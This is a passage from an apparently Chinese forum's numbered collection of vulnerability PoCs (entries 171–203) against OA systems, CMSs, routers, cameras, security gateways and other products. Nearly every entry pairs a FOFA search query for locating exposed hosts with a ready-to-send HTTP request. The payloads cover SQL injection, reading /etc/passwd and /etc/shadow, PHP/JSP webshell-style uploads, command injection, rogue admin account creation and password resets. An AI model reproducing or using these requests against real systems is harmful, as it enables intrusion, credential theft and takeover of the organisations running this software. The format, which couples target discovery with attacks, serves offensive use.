Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD licence plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardisation management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardisation management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualisation system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}


193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. Cockpit system assetsmanager_upload interface file upload
FOFA:title="Authenticate Please!"

1. Run the PoC to obtain the CSRF value, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returns: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returns:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--


Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2